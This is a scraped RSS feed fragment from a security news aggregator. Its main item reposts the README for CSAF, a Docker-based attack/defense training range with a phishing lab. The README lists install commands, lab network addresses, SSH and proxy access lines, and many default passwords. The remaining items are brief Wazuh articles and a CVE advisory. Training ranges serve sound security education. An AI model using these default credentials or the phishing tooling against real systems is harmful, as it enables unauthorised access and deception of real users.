<content:encoded><![CDATA[File Integrity Monitoring (FIM) is an IT security control that monitors and detects file changes in computer systems. It helps organizations audit important files and system configurations by routinely scanning and verifying their integrity. Most information security standards mandate the use of FIM for businesses to ensure the integrity of their data.
IT security compliance involves adhering to]]></content:encoded>
</item>
<item>
<title><![CDATA[CSAF - Cyber Security Awareness Framework]]></title>
<description><![CDATA[The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing Cybersecurity" title="Cybersecurity">cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective Cybersecurity" title="C...]]></description>
<link>https://tsecurity.de/de/2109247/it-security-nachrichten/csaf-cyber-security-awareness-framework/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2109247/it-security-nachrichten/csaf-cyber-security-awareness-framework/</guid>
<pubDate>Sun, 14 Apr 2024 05:51:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPpGK6ybQTiiGCmXLEZw62LYDU239GYCHC1Czw356H7t8e1pWRGH5vT-F52WmcuAqcUDL1Fv3d2BYCtf8KbhV5f_hFOKuuCtB0g4Okj_SvdcSsyOiqI_f04cmKWvzh2Hx-NhRIX10P0A-hMxx0P5ssXrAKIjilL5nK6hZR9sUOasNsI4NurT0AM2LxmWZS/s1280/csaf_1_csaf.png" imageanchor="1"><img border="0" data-original-height="569" data-original-width="1280" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPpGK6ybQTiiGCmXLEZw62LYDU239GYCHC1Czw356H7t8e1pWRGH5vT-F52WmcuAqcUDL1Fv3d2BYCtf8KbhV5f_hFOKuuCtB0g4Okj_SvdcSsyOiqI_f04cmKWvzh2Hx-NhRIX10P0A-hMxx0P5ssXrAKIjilL5nK6hZR9sUOasNsI4NurT0AM2LxmWZS/w640-h284/csaf_1_csaf.png" width="640"></a></div><div class="separator"><br></div>  <p>The <a href="https://www.kitploit.com/search/label/Cyber" target="_blank" title="Cyber">Cyber</a> Security Awareness <a href="https://www.kitploit.com/search/label/Framework" target="_blank" title="Framework">Framework</a> (CSAF) is a structured approach aimed at enhancing <a href="https://www.kitploit.com/search/label/%3Ca%20href=" https:="" target="_blank" title="Cyber">Cyber</a>security" title="<a href="https://www.kitploit.com/search/label/Cyber" target="_blank" title="Cyber">Cyber</a>security"&gt;cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective <a href="https://www.kitploit.com/search/label/%3Ca%20href=" https:="" target="_blank" title="Cyber">Cyber</a>security" title="<a href="https://www.kitploit.com/search/label/Cyber" target="_blank" title="Cyber">Cyber</a>security"&gt;cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational m   aterials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.</p><span><a name="more"></a></span><p><br></p><h1>Requirements</h1>  <h2>Software</h2>  <ul>  <li>Docker</li>  <li>Docker-compose</li>  </ul>  <h2>Hardware</h2>  <h3>Minimum</h3>  <ul>  <li>4 Core CPU</li>  <li>10GB RAM</li>  <li>60GB Disk free</li>  </ul>  <h3>Recommendation</h3>  <ul>  <li>8 Core CPU or above</li>  <li>16GB RAM or above</li>  <li>100GB Disk free or above</li>  </ul>  <h1>Installation</h1>  <p>Clone the repository</p>  <pre><code>git clone https://github.com/csalab-id/csaf.git<br></code></pre>  <p>Navigate to the project directory</p>  <pre><code>cd csaf<br></code></pre>  <p>Pull the Docker images</p>  <pre><code>docker-compose --profile=all pull<br></code></pre>  <p>Generate <a href="https://www.kitploit.com/search/label/Wazuh" target="_blank" title="wazuh">wazuh</a> ssl certificate</p>  <pre><code>docker-compose -f generate-indexer-certs.yml run --rm generator<br></code></pre>  <p>For security reason you should set env like this first</p>  <pre><code>export ATTACK_PASS=ChangeMePlease<br>export DEFENSE_PASS=ChangeMePlease<br>export MONITOR_PASS=ChangeMePlease<br>export SPLUNK_PASS=ChangeMePlease<br>export GOPHISH_PASS=ChangeMePlease<br>export MAIL_PASS=ChangeMePlease<br>export PURPLEOPS_PASS=ChangeMePlease<br></code></pre>  <p>Start all the containers</p>  <pre><code>docker-compose --profile=all up -d<br></code></pre>  <p>You can run specific profiles for running specific labs with the following profiles  - all  - attackdefenselab  - phisinglab  - breachlab  - soclab</p>  <p>For example</p>  <pre><code>docker-compose --profile=attackdefenselab up -d<br></code></pre>  <h1>Proof</h1>  <div class="separator"><br></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhtbWJYsEQMezs0GOq1AuQnQEiW15A2ld7pWRJFnmW1JYl8oSLJ7CNiPul7wTNiLXv23GmLqfNPitffn4XE8o7BO9bHSms4OwaXwYGuFvUbafiLMYtoU0gmNxlQzAtRZueyFiXN27VaeHgM5dhwGJpG7-fJDqU47JT9e0FQ0_kCFhS3aopMHr6GJymoOSR/s3104/csaf_6_caldera.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhtbWJYsEQMezs0GOq1AuQnQEiW15A2ld7pWRJFnmW1JYl8oSLJ7CNiPul7wTNiLXv23GmLqfNPitffn4XE8o7BO9bHSms4OwaXwYGuFvUbafiLMYtoU0gmNxlQzAtRZueyFiXN27VaeHgM5dhwGJpG7-fJDqU47JT9e0FQ0_kCFhS3aopMHr6GJymoOSR/w640-h408/csaf_6_caldera.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFpKdSALuVqDzbEhksKxAj3cw1kC31g-bumyHOUJW_uLCzZ3fUtGFlkV9q3RxrUuMTGDRHtpNcWPsrU_lDI3Kt4JeNjGM8Wm1LwWJsz7H0-Fdb92S4D1bZoUyLJrFX1KWUxu1lqIncZKbwj7_8vmNPHlgP9dquIT2ZosvTkX3zCwMWUvw3O3Z0A3deJP5D/s3104/csaf_7_dvwa_modsecurity.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFpKdSALuVqDzbEhksKxAj3cw1kC31g-bumyHOUJW_uLCzZ3fUtGFlkV9q3RxrUuMTGDRHtpNcWPsrU_lDI3Kt4JeNjGM8Wm1LwWJsz7H0-Fdb92S4D1bZoUyLJrFX1KWUxu1lqIncZKbwj7_8vmNPHlgP9dquIT2ZosvTkX3zCwMWUvw3O3Z0A3deJP5D/w640-h408/csaf_7_dvwa_modsecurity.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSg4GnOZ1_nV0BJntyo7JzAuTMQSNSzpqIfW-xQNeb4NE2b05myPWsFtgggRYBydhJ-GzuGmEBgqwZxXvZP16TVBZ0rUJKvQI2ftJG4TB7w6vEJ5_u3r2ziROtpqXi4LDDDhCF941SkoTn3snKgxT-IJ1ZgQLQRxdtR-q9Qv5Z4UKytgFWhVxRo2v3uxfK/s3104/csaf_8_gitea.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSg4GnOZ1_nV0BJntyo7JzAuTMQSNSzpqIfW-xQNeb4NE2b05myPWsFtgggRYBydhJ-GzuGmEBgqwZxXvZP16TVBZ0rUJKvQI2ftJG4TB7w6vEJ5_u3r2ziROtpqXi4LDDDhCF941SkoTn3snKgxT-IJ1ZgQLQRxdtR-q9Qv5Z4UKytgFWhVxRo2v3uxfK/w640-h408/csaf_8_gitea.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJRiwvq8o4aOog7QR1TEbxYNz3tIN-TTH98MxJE6zfey3Lb5LJhcxOHJOU0RNnGZJjq1uKtmc9Z_5Owceey9X_4sc7gHfHqU8vgjBmLCTEh2-YHAXrjhG8f5kiNaDz1OWrqT6C6vDEGS1udbHD4wEdzlEuyWnlAS_eChK0SxoSw7n2p37p_MtfnnMjIyNv/s3104/csaf_9_gophish.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJRiwvq8o4aOog7QR1TEbxYNz3tIN-TTH98MxJE6zfey3Lb5LJhcxOHJOU0RNnGZJjq1uKtmc9Z_5Owceey9X_4sc7gHfHqU8vgjBmLCTEh2-YHAXrjhG8f5kiNaDz1OWrqT6C6vDEGS1udbHD4wEdzlEuyWnlAS_eChK0SxoSw7n2p37p_MtfnnMjIyNv/w640-h408/csaf_9_gophish.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzuuCmz761EQj5dKTiAjOuPIabd1x7edI71YrwX3kDymK3I5cFp-kwjU8tRE5HWxfSSixoOH8bj46UKVA59TIR5aNnR4Hrw8fyr35RT5J78X3DmtdeGRQB4Qtm5fhNO8-VsjtGzWlZ_eUAIGes8L0pI9EFtbZYfpCfAH1pTqBcCvxHeGbdeBQRpAez3V26/s3104/csaf_10_infectionmonkey.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzuuCmz761EQj5dKTiAjOuPIabd1x7edI71YrwX3kDymK3I5cFp-kwjU8tRE5HWxfSSixoOH8bj46UKVA59TIR5aNnR4Hrw8fyr35RT5J78X3DmtdeGRQB4Qtm5fhNO8-VsjtGzWlZ_eUAIGes8L0pI9EFtbZYfpCfAH1pTqBcCvxHeGbdeBQRpAez3V26/w640-h408/csaf_10_infectionmonkey.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijZ6_7nSXwvuVcKPiEKMR8gShdEyqE6qPa5WsutN7Vmm8PjRXUN0vco_20irn838ZW0Brw1b26WMhbbWB6Yq43dj_D7d9aLxEEVFs-pulDXiHqAKLBxkhNDFZI1YCHJqp54QTKlp-b5qi8yfF8hdeWecFIC2cHERYo_pLksZcyMEAjNxduHNKqjruodstH/s3104/csaf_11_iredmail.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijZ6_7nSXwvuVcKPiEKMR8gShdEyqE6qPa5WsutN7Vmm8PjRXUN0vco_20irn838ZW0Brw1b26WMhbbWB6Yq43dj_D7d9aLxEEVFs-pulDXiHqAKLBxkhNDFZI1YCHJqp54QTKlp-b5qi8yfF8hdeWecFIC2cHERYo_pLksZcyMEAjNxduHNKqjruodstH/w640-h408/csaf_11_iredmail.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjedTWWrqW4GbAc1XHXwP10N9DnQjh7h6I_1cpJNS9Jlj9vsxQdoa8JJiKcE7zHhfEItHLYnxQVqAMwRHGlKLsWJSptt0qPi7VUwp3eTUh5tf2QkRlASCPYpu8-jWjtLk5qzAZbVDxVv8bPXY-6UQprLA8SmX92OrLvBu38LUFe56ANa389mPQo924UGB96/s3104/csaf_12_juiceshop.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjedTWWrqW4GbAc1XHXwP10N9DnQjh7h6I_1cpJNS9Jlj9vsxQdoa8JJiKcE7zHhfEItHLYnxQVqAMwRHGlKLsWJSptt0qPi7VUwp3eTUh5tf2QkRlASCPYpu8-jWjtLk5qzAZbVDxVv8bPXY-6UQprLA8SmX92OrLvBu38LUFe56ANa389mPQo924UGB96/w640-h408/csaf_12_juiceshop.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNpNvIrRYUJFqiaosjoaFpQrGgdFxwaY8j4A3-Hrhj29gGad4IroBEObppYaNemI-TWEJJIgvXortNttMI1LqQKEPxjOq_fdr8dDz3s3TzeqFPJcI7NxvLGco46Bpcih4CUFQcB5n_6ZRfdgiY1xfmSGJ03ZZcPcnhjcbexK2L5FGTqaXPDf4UL_WPEVmK/s3104/csaf_13_mitmproxy.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNpNvIrRYUJFqiaosjoaFpQrGgdFxwaY8j4A3-Hrhj29gGad4IroBEObppYaNemI-TWEJJIgvXortNttMI1LqQKEPxjOq_fdr8dDz3s3TzeqFPJcI7NxvLGco46Bpcih4CUFQcB5n_6ZRfdgiY1xfmSGJ03ZZcPcnhjcbexK2L5FGTqaXPDf4UL_WPEVmK/w640-h408/csaf_13_mitmproxy.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghm6cYwV4co2_Xnlk3T35SldYsK7uoLcnXXrSOdrS31A1LUIVoQiFSRJMe6o5QCknUtlc-R-PztIV9-0WHn0nt1JW5a_kxOSbVo-P1nHMO0tSYP82990-488Y74_sSXUDKTXuVvg-7XsmKEo-a6Iuce1kwEhbUUE2CiAM4CEMS1HWmS3aBTDtmWdu9I-j1/s3104/csaf_14_phising.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghm6cYwV4co2_Xnlk3T35SldYsK7uoLcnXXrSOdrS31A1LUIVoQiFSRJMe6o5QCknUtlc-R-PztIV9-0WHn0nt1JW5a_kxOSbVo-P1nHMO0tSYP82990-488Y74_sSXUDKTXuVvg-7XsmKEo-a6Iuce1kwEhbUUE2CiAM4CEMS1HWmS3aBTDtmWdu9I-j1/w640-h408/csaf_14_phising.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG3bLVMQv-wlpe9VJrXXZYoFfGhzyXLJ9EcKBOFVZpUgCF2FLfGUlcMYw-QJQ0mC_b6TbzbWR5Zevs_10NsctUXn3PgLnI1-dWwKDx83V7Jk5_Q3oaLFQrwR6NYFTPrYqOKaWlzIW7rXkxvpbrWQ1PxxjXcAtfD0w4Vc6NoTzGg9eKq0giGO2RuVQit01u/s3104/csaf_15_purpleops.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG3bLVMQv-wlpe9VJrXXZYoFfGhzyXLJ9EcKBOFVZpUgCF2FLfGUlcMYw-QJQ0mC_b6TbzbWR5Zevs_10NsctUXn3PgLnI1-dWwKDx83V7Jk5_Q3oaLFQrwR6NYFTPrYqOKaWlzIW7rXkxvpbrWQ1PxxjXcAtfD0w4Vc6NoTzGg9eKq0giGO2RuVQit01u/w640-h408/csaf_15_purpleops.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitmkffE2eR5g3bsZ4054bAgMnZOsaf5h2WMB7MxBIyDAkKDRugk6yh8A5tFam8NpuyVTvZknQxpLHvrLAYep4boKsppN3eeHRWTMytgYSu3s6drWH8SxZ_Pq8gxgS7yBVTgOoPVkns-JwLK022Khc_3KEH3bn49H7CFcKhrEkuVsb9ffxHBVfgsOWwP5i7/s3104/csaf_16_roundcube.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitmkffE2eR5g3bsZ4054bAgMnZOsaf5h2WMB7MxBIyDAkKDRugk6yh8A5tFam8NpuyVTvZknQxpLHvrLAYep4boKsppN3eeHRWTMytgYSu3s6drWH8SxZ_Pq8gxgS7yBVTgOoPVkns-JwLK022Khc_3KEH3bn49H7CFcKhrEkuVsb9ffxHBVfgsOWwP5i7/w640-h408/csaf_16_roundcube.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKBp0dZePq6oD4ugGQ_oiLFxjeZdzzCqmwm3sQvUObE5DmBpg2YTewYxX2YMElQjKDWO2z5CNl8u7KXAHknuC9GWDAldR4w71_hUqesqgkZSbpuhoGb1o95Af4grPPEKyDs6NFmYQNyGNKYtjlUHKwN9FNmn0DIGtny8PsaZa3tz6HAxOtS1QJIVmzrGBM/s3104/csaf_17_splunk.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKBp0dZePq6oD4ugGQ_oiLFxjeZdzzCqmwm3sQvUObE5DmBpg2YTewYxX2YMElQjKDWO2z5CNl8u7KXAHknuC9GWDAldR4w71_hUqesqgkZSbpuhoGb1o95Af4grPPEKyDs6NFmYQNyGNKYtjlUHKwN9FNmn0DIGtny8PsaZa3tz6HAxOtS1QJIVmzrGBM/w640-h408/csaf_17_splunk.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSjX0GevVIG3oSUqB5yUIG87WpZZU937iTlWpEkosiX7jhaOEMHPUdpUKBLRRG-d4Jaf3_uPfg9253QIQxCQ6dNIEEPSVBefaZZygpkWcbKLaIbgvF7yZmMupbZtJatsFYEA7EIvX0P-JcrnzTxwpm_0qc1Iz-_QkZ7bGbojwirHoOlMEibg0yw7FhWrFW/s3104/csaf_18_wackopicko.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSjX0GevVIG3oSUqB5yUIG87WpZZU937iTlWpEkosiX7jhaOEMHPUdpUKBLRRG-d4Jaf3_uPfg9253QIQxCQ6dNIEEPSVBefaZZygpkWcbKLaIbgvF7yZmMupbZtJatsFYEA7EIvX0P-JcrnzTxwpm_0qc1Iz-_QkZ7bGbojwirHoOlMEibg0yw7FhWrFW/w640-h408/csaf_18_wackopicko.png" width="640"></a></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs3jmVXEKv40C7KeNzshkyL4RNFYnDVm3SpKKSYPsRcnJySYxYWvwOFa1e1h8eUBAwPCCWvR7ZPxl6nhfNKoyTifldI9VxCPogoegokMuEM56D_cr97YGz2fHjz5mjoDmt3qJ4Ehae9wZeQF4jSumBZo9aVBVcKwWFqVYuIxTQWT4oTKbREgI8jK2MUCiN/s3104/csaf_19_wazuh.png" imageanchor="1"><img border="0" data-original-height="1974" data-original-width="3104" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs3jmVXEKv40C7KeNzshkyL4RNFYnDVm3SpKKSYPsRcnJySYxYWvwOFa1e1h8eUBAwPCCWvR7ZPxl6nhfNKoyTifldI9VxCPogoegokMuEM56D_cr97YGz2fHjz5mjoDmt3qJ4Ehae9wZeQF4jSumBZo9aVBVcKwWFqVYuIxTQWT4oTKbREgI8jK2MUCiN/w640-h408/csaf_19_wazuh.png" width="640"></a></div><div><br></div>  <h1>Exposed Ports</h1>  <p>An exposed port can be accessed using a proxy <a href="https://www.kitploit.com/search/label/Socks5" target="_blank" title="socks5">socks5</a> client, SSH client, or HTTP client. Choose one for the best experience.</p>  <ul>  <li>Port 6080 (Access to attack network)</li>  <li>Port 7080 (Access to defense network)</li>  <li>Port 8080 (Access to monitor network)</li>  </ul>  <h1>Example usage</h1>  <h2>Access internal network with proxy socks5</h2>  <ul>  <li>curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html</li>  <li>curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html</li>  <li>curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html</li>  </ul>  <h2>Remote ssh with ssh client</h2>  <ul>  <li>ssh kali@ipaddress -p 6080 (default password: attackpassword)</li>  <li>ssh kali@ipaddress -p 7080 (default password: defensepassword)</li>  <li>ssh kali@ipaddress -p 8080 (default password: monitorpassword)</li>  </ul>  <h2>Access kali linux desktop with curl / browser</h2>  <ul>  <li>curl http://ipaddress:6080/vnc.html</li>  <li>curl http://ipaddress:7080/vnc.html</li>  <li>curl http://ipaddress:8080/vnc.html</li>  </ul>  <h1>Domain Access</h1>  <ul>  <li>http://attack.lab/vnc.html (default password: attackpassword)</li>  <li>http://defense.lab/vnc.html (default password: defensepassword)</li>  <li>http://monitor.lab/vnc.html (default password: monitorpassword)</li>  <li>https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)</li>  <li>https://server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)</li>  <li>https://server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)</li>  <li>https://mail.server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)</li>  <li>https://mail.server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)</li>  <li>http://phising.lab/</li>  <li>http://10.0.0.200:8081/</li>  <li>http://gitea.lab/ (default username: csalab, default password: giteapassword)</li>  <li>http://dvwa.lab/ (default username: admin, default passowrd: password)</li>  <li>http://dvwa-monitor.lab/ (default username: admin, default passowrd: password)</li>  <li>http://dvwa-modsecurity.lab/ (default username: admin, default passowrd: password)</li>  <li>http://wackopicko.lab/</li>  <li>http://juiceshop.lab/</li>  <li>https://wazuh-indexer.lab:9200/ (default username: admin, default passowrd: SecretPassword)</li>  <li>https://wazuh-manager.lab/</li>  <li>https://wazuh-dashboard.lab:5601/ (default username: admin, default passowrd: SecretPassword)</li>  <li>http://splunk.lab/ (default username: admin, default password: splunkpassword)</li>  <li>https://infectionmonkey.lab:5000/</li>  <li>http://purpleops.lab/ (default username: admin@purpleops.com, default password: purpleopspassword)</li>  <li>http://caldera.lab/ (default username: red/blue, default password: calderapassword)</li>  </ul>  <h1>Network / IP Address</h1>  <h2>Attack</h2>  <ul>  <li>10.0.0.100 attack.lab</li>  <li>10.0.0.200 phising.lab</li>  <li>10.0.0.201 server.lab</li>  <li>10.0.0.201 mail.server.lab</li>  <li>10.0.0.202 gophish.lab</li>  <li>10.0.0.110 infectionmonkey.lab</li>  <li>10.0.0.111 mongodb.lab</li>  <li>10.0.0.112 purpleops.lab</li>  <li>10.0.0.113 caldera.lab</li>  </ul>  <h2>Defense</h2>  <ul>  <li>10.0.1.101 defense.lab</li>  <li>10.0.1.10 dvwa.lab</li>  <li>10.0.1.13 wackopicko.lab</li>  <li>10.0.1.14 juiceshop.lab</li>  <li>10.0.1.20 gitea.lab</li>  <li>10.0.1.110 infectionmonkey.lab</li>  <li>10.0.1.112 purpleops.lab</li>  <li>10.0.1.113 caldera.lab</li>  </ul>  <h2>Monitor</h2>  <ul>  <li>10.0.3.201 server.lab</li>  <li>10.0.3.201 mail.server.lab</li>  <li>10.0.3.9 mariadb.lab</li>  <li>10.0.3.10 dvwa.lab</li>  <li>10.0.3.11 dvwa-monitor.lab</li>  <li>10.0.3.12 dvwa-modsecurity.lab</li>  <li>10.0.3.102 monitor.lab</li>  <li>10.0.3.30 wazuh-manager.lab</li>  <li>10.0.3.31 wazuh-indexer.lab</li>  <li>10.0.3.32 wazuh-dashboard.lab</li>  <li>10.0.3.40 splunk.lab</li>  </ul>  <h2>Public</h2>  <ul>  <li>10.0.2.101 defense.lab</li>  <li>10.0.2.13 wackopicko.lab</li>  </ul>  <h2>Internet</h2>  <ul>  <li>10.0.4.102 monitor.lab</li>  <li>10.0.4.30 wazuh-manager.lab</li>  <li>10.0.4.32 wazuh-dashboard.lab</li>  <li>10.0.4.40 splunk.lab</li>  </ul>  <h2>Internal</h2>  <ul>  <li>10.0.5.100 attack.lab</li>  <li>10.0.5.12 dvwa-modsecurity.lab</li>  <li>10.0.5.13 wackopicko.lab</li>  </ul>  <h1>License</h1>  <p>This Docker Compose application is released under the MIT License. See the <a href="https://www.mit.edu/~amini/LICENSE.md" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a> file for details.</p><br><br><div><b><span><a class="kiploit-download" href="https://github.com/csalab-id/csaf" rel="nofollow" target="_blank" title="Download Csaf">Download Csaf</a></span></b></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Implementing container security best practices using Wazuh]]></title>
<description><![CDATA[Maintaining visibility into container hosts, ensuring best practices, and conducting vulnerability assessments are necessary to ensure effective security. In this article Wazuh explores how its software can help implement best security practices for containerized environments. [...]]]></description>
<link>https://tsecurity.de/de/2085938/it-security-nachrichten/implementing-container-security-best-practices-using-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2085938/it-security-nachrichten/implementing-container-security-best-practices-using-wazuh/</guid>
<pubDate>Tue, 26 Mar 2024 21:05:47 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Maintaining visibility into container hosts, ensuring best practices, and conducting vulnerability assessments are necessary to ensure effective security. In this article Wazuh explores how its software can help implement best security practices for containerized environments. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh in the Cloud Era: Navigating the Challenges of Cybersecurity]]></title>
<description><![CDATA[Cloud computing has innovated how organizations operate and manage IT operations, such as data storage, application deployment, networking, and overall resource management. The cloud offers scalability, adaptability, and accessibility, enabling businesses to achieve sustainable growth. However, a...]]></description>
<link>https://tsecurity.de/de/2024993/it-security-nachrichten/wazuh-in-the-cloud-era-navigating-the-challenges-of-cybersecurity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2024993/it-security-nachrichten/wazuh-in-the-cloud-era-navigating-the-challenges-of-cybersecurity/</guid>
<pubDate>Fri, 09 Feb 2024 08:51:06 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cloud computing has innovated how organizations operate and manage IT operations, such as data storage, application deployment, networking, and overall resource management. The cloud offers scalability, adaptability, and accessibility, enabling businesses to achieve sustainable growth. However, adopting cloud technologies into your infrastructure presents various cybersecurity risks and]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-42463 | Wazuh up to 4.5.2 stack-based overflow (GHSA-27p5-32pp-r58r)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in Wazuh up to 4.5.2. This affects an unknown part. The manipulation leads to stack-based buffer overflow.

This vulnerability is uniquely identified as CVE-2023-42463. It is possible to launch the attack on the local host. There is no exploit...]]></description>
<link>https://tsecurity.de/de/2016904/sicherheitsluecken/cve-2023-42463-wazuh-up-to-452-stack-based-overflow-ghsa-27p5-32pp-r58r/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2016904/sicherheitsluecken/cve-2023-42463-wazuh-up-to-452-stack-based-overflow-ghsa-27p5-32pp-r58r/</guid>
<pubDate>Sat, 03 Feb 2024 01:54:17 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">critical</a> has been found in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.5.2</a>. This affects an unknown part. The manipulation leads to stack-based buffer overflow.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.250659">CVE-2023-42463</a>. It is possible to launch the attack on the local host. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Role of Wazuh in building a robust cybersecurity architecture]]></title>
<description><![CDATA[Leveraging open source solutions and tools to build a cybersecurity architecture offers organizations several benefits. Learn more from Wazuh about the benefits of open source solutions. [...]]]></description>
<link>https://tsecurity.de/de/2007205/it-security-nachrichten/role-of-wazuh-in-building-a-robust-cybersecurity-architecture/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2007205/it-security-nachrichten/role-of-wazuh-in-building-a-robust-cybersecurity-architecture/</guid>
<pubDate>Fri, 26 Jan 2024 16:54:05 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Leveraging open source solutions and tools to build a cybersecurity architecture offers organizations several benefits. Learn more from Wazuh about the benefits of open source solutions. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh: Building robust cybersecurity architecture with open source tools]]></title>
<description><![CDATA[Open source solutions allow organizations to customize and adapt their cybersecurity infrastructure to their specific needs. Learn more from @wazuh on building open source cybersecurity infrastructure. [...]]]></description>
<link>https://tsecurity.de/de/1994621/it-security-nachrichten/wazuh-building-robust-cybersecurity-architecture-with-open-source-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1994621/it-security-nachrichten/wazuh-building-robust-cybersecurity-architecture-with-open-source-tools/</guid>
<pubDate>Wed, 17 Jan 2024 16:36:40 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Open source solutions allow organizations to customize and adapt their cybersecurity infrastructure to their specific needs. Learn more from @wazuh on building open source cybersecurity infrastructure. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Building a Robust Threat Intelligence with Wazuh]]></title>
<description><![CDATA[Threat intelligence refers to gathering, processing, and analyzing cyber threats, along with proactive defensive measures aimed at strengthening security. It enables organizations to gain a comprehensive insight into historical, present, and anticipated threats, providing context about the consta...]]></description>
<link>https://tsecurity.de/de/1953774/it-security-nachrichten/building-a-robust-threat-intelligence-with-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1953774/it-security-nachrichten/building-a-robust-threat-intelligence-with-wazuh/</guid>
